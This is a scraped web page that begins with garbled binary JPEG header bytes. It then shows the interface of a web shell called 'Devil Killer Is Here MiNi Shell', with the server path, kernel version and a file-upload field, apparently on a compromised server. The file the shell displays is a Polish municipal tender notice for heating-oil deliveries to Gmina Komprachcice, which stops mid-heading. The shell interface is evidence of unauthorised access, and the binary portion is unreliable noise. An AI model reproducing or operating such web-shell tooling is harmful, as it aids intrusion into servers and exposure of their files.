JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230710/0029771701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa oleju opałowego lekkiego (oleju do celów grzewczych) do obiektów Gminy Komprachcice , w okresie od dnia podpisania umowy do 30 czerwca 2024 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Komprachcice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413082</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Komprachcice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-070</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774031712</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">774031725</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@komprachcice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.komprachcice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa oleju opałowego lekkiego (oleju do celów grzewczych) do obiektów Gminy Komprachcice , w okresie od dnia podpisania umowy do 30 czerwca 2024 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2dede812-1ef9-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00297717</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00031385/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Sukcesywna dostawa oleju opałowego lekkiego (oleju do celów grzewczych) do obiektów Gminy Komprachcice, w okresie od dnia podpisania umowy do 30 czerwca 2024 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2dede812-1ef9-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej, za<br/>pośrednictwem:<br/>• miniPortalu: https://miniportal.uzp.gov.pl<br/>• ePUAPu: https://epuap.gov.pl/wps/portal<br/>• adres skrytki ePUAP: /6300muywi2/skrytka<br/>• poczty elektronicznej: ug@komprachcice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oferta<br/>wraz z załącznikami musi zostać złożona w postaci elektronicznej (w formacie danych: doc, .docx, .rtf,<br/>.pdf, (pliki kompresować należy do formatu ZIP) oraz podpisana kwalifikowanym podpisem<br/>elektronicznym, podpisem osobistym lub podpisem zaufanym pod rygorem nieważności.<br/>Zgodnie z art. 3 pkt 14a ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów<br/>realizujących zadania publiczne, podpis zaufany to podpis elektroniczny, którego autentyczność<br/>i integralność są zapewniane przy użyciu pieczęci elektronicznej ministra właściwego do spraw<br/>informatyzacji, zawierający dane identyfikujące osobę tj. imię (imiona), nazwisko, PESEL, ustalone na<br/>podstawie środka identyfikacji elektronicznej, identyfikator środka identyfikacji elektronicznej, przy<br/>użyciu którego został złożony, czas jego złożenia.<br/>Zgodnie z art. 2 ust. 1 pkt 9 ustawy z 6 sierpnia 2010 r. o dowodach osobistych podpis osobisty to zaawansowany podpis elektroniczny w rozumieniu art. 3 pkt 11 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) nr 910/2014 z 23 lipca 2014 r. w sprawie identyfikacji elektronicznej<br/>i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym oraz uchylającego<br/>dyrektywę 1999/93/WE, weryfikowany za pomocą certyfikatu podpisu osobistego.<br/>Oferta powinna być podpisana przez upoważnioną osobę pod rygorem jej nieważności. Za osoby<br/>uprawnione do składania oświadczeń woli w imieniu Wykonawców uznaje się: osoby wykazane<br/>w prowadzonych przez sądy rejestrach handlowych; osoby wykazane w zaświadczeniach o wpisie do<br/>ewidencji działalności gospodarczej; osoby legitymujące się odpowiednim pełnomocnictwem<br/>udzielonym przez osoby, których mowa powyżej.<br/>Wykonawca składa ofertę za pośrednictwem systemu miniPortal: https://miniportal.uzp.gov.pl.<br/>Instrukcja użytkowania systemu miniPortal dostępna jest na stronie: https://www.uzp.gov.pl/ezamowienia2/<br/>miniportal w linku „nowa instrukcja obsługi”.<br/>W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, pod którym prowadzona będzie korespondencja związana z postępowaniem.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych jest: Wójt Gminy<br/>Komprachcice<br/>ul. Kolejowa 3, 46-070 Komprachcice, tel.: 77 403 17 25, ug@komprachcice.pl<br/>Inspektorem ochrony danych osobowych w Gminie Komprachcice jest Maria Grot: tel.: 77 403 17 25,<br/>ug@komprachcice.pl<br/>Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego znak:<br/>ZP.271.2.2021 pn. Sukcesywna dostawa oleju opałowego lekkiego, (...)&#34;<br/>Odbiorcami danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja<br/>postępowania zgodnie z art. 18 oraz art. 74 ustawy Pzp, Dane osobowe będą przechowywane przez<br/>okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony<br/>w powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w<br/>którym dane osobowe zostały zebrane (tj. cel określony w pkt 16.4. powyżej), przed takim dalszym<br/>przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich<br/>innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z<br/>uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem wykonawcy do<br/>uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące,<br/>prawem wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, których mowa w art.<br/>46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji<br/>międzynarodowej oraz prawem otrzymania przez wykonawcę od administratora kopii danych<br/>osobowych podlegających przetwarzaniu), zamawiający może żądać od osoby występującej z<br/>żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia.<br/>Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16<br/>RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może naruszać<br/>integralności protokołu postępowania oraz jego załączników). <br/>W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania.<br/>W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO<br/>spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust.<br/>2 rozporządzenia 2016/679.<br/>Obowiązek podania przez wykonawcę danych osobowych bezpośrednio dotyczących wykonawcy jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp.<br/>W odniesieniu do danych osobowych wykonawcy decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>Wykonawca posiada, na podstawie art. 15 RODO prawo dostępu do danych osobowych wykonawcy<br/>dotyczących oraz prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>wykonawca uzna, że przetwarzanie danych osobowych wykonawcy narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięcia danych osobowych,<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.272.4.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1.	Przedmiotem zamówienia jest sukcesywna dostawa oleju opałowego lekkiego, (oleju napędowego grzewczego; oleju napędowego do celów grzewczych) od dnia podpisania umowy do 30.06.2024 r. do obiektów gminy Komprachcice, w szacunkowej ilości ok. 116.000,00 litrów do niżej wymienionych obiektów:<br/>a)	Samorządowy Ośrodek Kultury w Komprachcice (ok. 20.000 l.)<br/>b)	Ośrodka Zdrowia w Komprachcicach (ok. 30.000 l. )<br/>c)	Publiczna Szkoła Podstawowa w Komprachcicach (50.000 l.)<br/>d)	Publiczna Szkoła Podstawowa w Polskiej Nowej Wsi (ok. 16.000 l.)<br/><br/>Podana powyżej ilość jest ilością szacunkową. Może ulec zwiększeniu lub zmniejszeniu<br/>w przypadku zaistnienia okoliczności, na które Zamawiający nie ma wpływu, w tym niekorzystnych warunków atmosferycznych. Realizacja zamówienia odbywać się będzie co najmniej w ciągu 48 godzin od momentu zgłoszenia telefonicznie zapotrzebowania przez Zamawiającego. Zakłada się, że dostawy oleju opałowego realizowane będą w dni robocze, od poniedziałku do piątku, w godzinach od 7:30 do 14:00 w dniu uzgodnionym z Zamawiającym. <br/><br/>Dostawy należy zrealizować na podstawie:<br/>- wymogów SWZ wraz z Projektowanymi postanowieniami umowy stanowiącymi Załącznik nr 7 do SWZ,<br/>Podana powyżej ilość jest ilością szacunkową. Może ulec zwiększeniu lub zmniejszeniu<br/>w przypadku zaistnienia okoliczności, na które Zamawiający nie ma wpływu, w tym niekorzystnych warunków atmosferycznych. Realizacja zamówienia odbywać się będzie co najmniej w ciągu 48 godzin od momentu zgłoszenia telefonicznie zapotrzebowania przez Zamawiającego. Zakłada się, że dostawy oleju opałowego realizowane będą w dni robocze, od poniedziałku do piątku, w godzinach od 7:30 do 14:00 w dniu uzgodnionym z Zamawiającym. <br/><br/>1.2. Szczegółowy opis przedmiotu zamówienia: <br/><br/>1)	Olej opałowy musi spełniać wymagania określone w Rozporządzeniu Ministra Gospodarki z dn. 9 października 2015 r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz.U. 2015 poz.1680) oraz wymogami normy PN-C-96024 L1 posiadać następujące minimalne parametry:<br/>- gęstość: w 15°C - max 0,860 kg/l (tożsamo w 20°C - max 0,835 kg/l) - wartość opałowa nie mniejsza niż 42,6 MJ/kg<br/>- zawartość siarki max.0,1%<br/>- zawartość zanieczyszczeń stałych nie większa niż 24 mg/kg<br/>- zawartość wody max. 200mg/kg<br/>- temperatura zapłonu – min.56 o C<br/><br/>2) Z uwagi na możliwość zmiany bieżących potrzeb w trakcie realizacji umowy Zamawiający ma prawo do:<br/>a) zmniejszenia zakresu realizacji przedmiotu zamówienia powodującej zmianę wartości zawartej umowy maksymalnie o 30 %.<br/>b) zwiększenia zakresu realizacji przedmiotu zamówienia powodującej zmianę wartości zawartej umowy maksymalnie o 25 %. <br/><br/>3) Wykonawcy nie przysługuje żadne roszczenie w stosunku do Zamawiającego w przypadku wystąpienia okoliczności określonej w pkt 2), w tym: zmiana zaoferowanych przez Wykonawcę<br/>w złożonej ofercie ceny jednostkowej, żądanie realizacji umowy do wysokości 100 % ceny umownej.<br/><br/>4) Sposób realizacji dostaw <br/> - Wykonawca zobowiązany będzie dostarczać przedmiot umowy sukcesywnie przez okres trwania umowy po cenach jednostkowych, zgodnie z Formularzem ofertowym, stanowiącym załącznik<br/>do niniejszego SIWZ.<br/>- Dostawa oleju odbywać się będzie transportem Wykonawcy, na koszt i ryzyko Wykonawcy.<br/>- Wielkość i termin każdorazowej dostawy Zamawiający określi według bieżących potrzeb, składając Wykonawcy zamówienie w terminie minimum 2 dni od daty wymaganej dostawy oleju.<br/>- Zgłoszenia zapotrzebowania na dostawy, w imieniu Zamawiającego, będzie dokonywał Pracownika Zamawiającego<br/>- Zamówienia będą składane Wykonawcy telefonicznie, faxem lub drogą elektroniczną.<br/>- Wykonawca będzie zobowiązany do telefonicznego zawiadomienia Zamawiającego o przygotowaniu towaru do wydania, z wyprzedzeniem przed ustalonym terminem dostawy.<br/><br/>5) Zmiana ceny oleju możliwa jest jedynie wskutek niezależnych od Wykonawcy jej zmian na krajowym rynku paliw i tylko w stopniu odpowiadającym tym zmianom, tzn.:<br/>- podniesienia podatku akcyzowego lub innego obciążenia podatkowego dotyczącego paliw i wyrobów petrochemicznych obligatoryjnie ustalonego przez rząd RP,<br/>- wzrostu cen paliw u krajowych producentów paliw płynnych.<br/><br/>6) Wykonawca jest obowiązany do stosowania ceny brutto za 1 litr paliwa obowiązującej w dniu tankowania. <br/><br/>7) Do każdej dostawy Wykonawca dołączy świadectwo jakości oleju opałowego.<br/><br/>8) Miernikiem dostarczonego oleju opałowego będą wskazania zalegalizowanego licznika paliwa zainstalowanego na autocysternie dowożącej olej w obecności upoważnionego przez Zamawiającego pracownika. <br/><br/>9) Dostawy oleju będą odbywać się przy rozliczeniu w temperaturze referencyjnej 15ºC. <br/><br/>10) Zakres zamówienia obejmuje sprzedaż oleju opałowego Zamawiającemu, załadunek, transport oleju na miejsce przeznaczenia, rozładunek oleju.<br/><br/>11) Realizacja zamówienia odbywać się będzie transportem własnym Wykonawcy na miejsce wskazane przez Zamawiającego w zamówieniu na terenie Gminy Komprachcice.<br/><br/>12) Wykonawca ma obowiązek dokładnego i sumiennego rozliczania się przed Zamawiającym z ilości i jakości przywiezionego oleju.<br/><br/>13) Zamawiający zastrzega sobie prawo do sprawdzenia ilości przywiezionego oleju, jak również do dokonania badania jakości przywiezionego oleju.<br/><br/>14) Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone osobom trzecim przez Wykonawcę podczas wykonywania przedmiotu zamówienia.<br/><br/>15) Na dostarczony olej Zamawiającemu przysługuje roszczenie z tytułu rękojmi na okres 2 lat zgodnie z Kodeksem cywilnym. Ponadto na ten sam okres Wykonawca udziela Zamawiającemu gwarancji jakości.<br/><br/>16) Wykonawca zrealizuje sprzedaż wraz z transportem zgodnie ze złożoną ofertą, warunkami określonymi w Specyfikacji Istotnych Warunków Zamówienia, ogłoszeniem oraz obowiązującymi przepisami prawa i zasadami wiedzy technicznej<br/>17) Miejsce realizacji zamówienia, pojemność poszczególnych zbiorników i prognozowane zużycie oleju:<br/>1.	Kotłownia obsługująca Urząd Gminy oraz Ośrodek Zdrowia zlokalizowana przy ul. Ks. Bilińskiego w Komprachcicach 30.000 l.<br/>2.	Kotłownia obsługująca Bibliotekę, Samorządowy Ośrodek Kultury i Przedszkole zlokalizowana przy ul. Niemodlińska 2 w Komprachcicach <br/>20.000 l.<br/>3.	Publiczna Szkoła Podstawowa, ul. Szkolna 18 <br/>w Komprachcicach, 50.000 l.<br/>4. Publiczna Szkoła Podstawowa, ul. Lipowa 56, w Polskiej Nowej Wsi	<br/>16.000 l. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09135100-5 - Olej opałowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/>1)	Cena brutto (C) - waga kryterium 60%<br/>2)	Termin realizacji dostawy częściowej w godzinach (po otrzymaniu zgłoszenia o zapotrzebowaniu) (T) - waga kryterium 40%.<br/>2.	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P = C + T<br/>gdzie:<br/>P – łączna liczba punktów przyznanych badanej ofercie, <br/>C – liczba punktów w kryterium „cena brutto”,<br/>T – liczba punktów w kryterium „Termin realizacji dostawy częściowej w godzinach (po otrzymaniu zgłoszenia o zapotrzebowaniu)”.<br/>3.	Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>1)	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 1 ppkt 1) poprzez porównanie ceny brutto oferty badanej do ceny brutto najniższej ze wszystkich ważnych ofert, wg poniższego wzoru:<br/>cena brutto najniższa <br/>ze wszystkich ważnych ofert<br/>C = ------------------------------------------------ x 60<br/>cena brutto oferty badanej <br/>2)	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 1 ppkt 2) poprzez przyznanie punktów za zaoferowany Termin realizacji dostawy częściowej w godzinach (po otrzymaniu zgłoszenia o zapotrzebowaniu), w następujący sposób:<br/>a)	za zaoferowanie minimalnego, wymaganego przez Zamawiającego w SWZ terminu realizacji dostawy częściowej do 24 godzin, ofercie zostanie przyznane w tym kryterium 40 punktów,<br/>b)	za zaoferowanie SWZ terminu realizacji dostawy częściowej do 25 do 48 godzin– ofercie zostanie przyznane w tym kryterium 20 punktów,<br/>c)	za zaoferowanie SWZ terminu realizacji dostawy częściowej powyżej 48 godzin – ofercie zostanie przyznane w tym kryterium 0,00 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji dostawy w godzinach , po otrzymaniu zgłoszenia o zapotrezbowaniu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA 